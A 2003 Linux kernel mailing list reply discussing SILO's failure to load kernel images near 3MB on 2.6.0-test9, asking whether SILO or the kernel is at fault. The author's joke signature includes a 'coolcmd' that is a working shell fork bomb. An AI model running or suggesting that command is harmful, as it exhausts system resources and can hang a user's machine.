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Re: Image too large to fit into destination with 2.6.0-test9

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On Tuesday 25 November 2003 10:40, David S. Miller wrote:
> It's the size of the image ungzipped that determines whether SILO can
> load it successfully or not, and 3MB is definitely pushing the limits.

I thought that was what mattered, but is it fixable? 3MB is not enough for
everybody. I'd say it's hardly enough for anybody actually.

Is it SILO or the kernel that needs to be fixed? Is it like the zImage/bzImage
issue of where in memory the kernel is placed, and if so, can it be made to
load elsewhere?

I've had this problem with 2.4.x and with 2.5.x/2.6.x, and all I can find on
the issue is "make it smaller". It's not a fix.

I'd be willing to dive in and try to fix it if I got some pointers. I don't
know if I would succeed, but I'd try.

- ---------
typedef struct me_s {
  char name[]      = { "Thomas Habets" };
  char email[]     = { "thomas@habets.pp.se" };
  char kernel[]    = { "Linux 2.4" };
  char *pgpKey[]   = { "http://www.habets.pp.se/pubkey.txt"; };
  char pgp[] = { "A8A3 D1DD 4AE0 8467 7FDE  0945 286A E90A AD48 E854" };
  char coolcmd[]   = { "echo '. ./_&. ./_'>_;. ./_" };
} me_t;
Version: GnuPG v1.2.3 (GNU/Linux)


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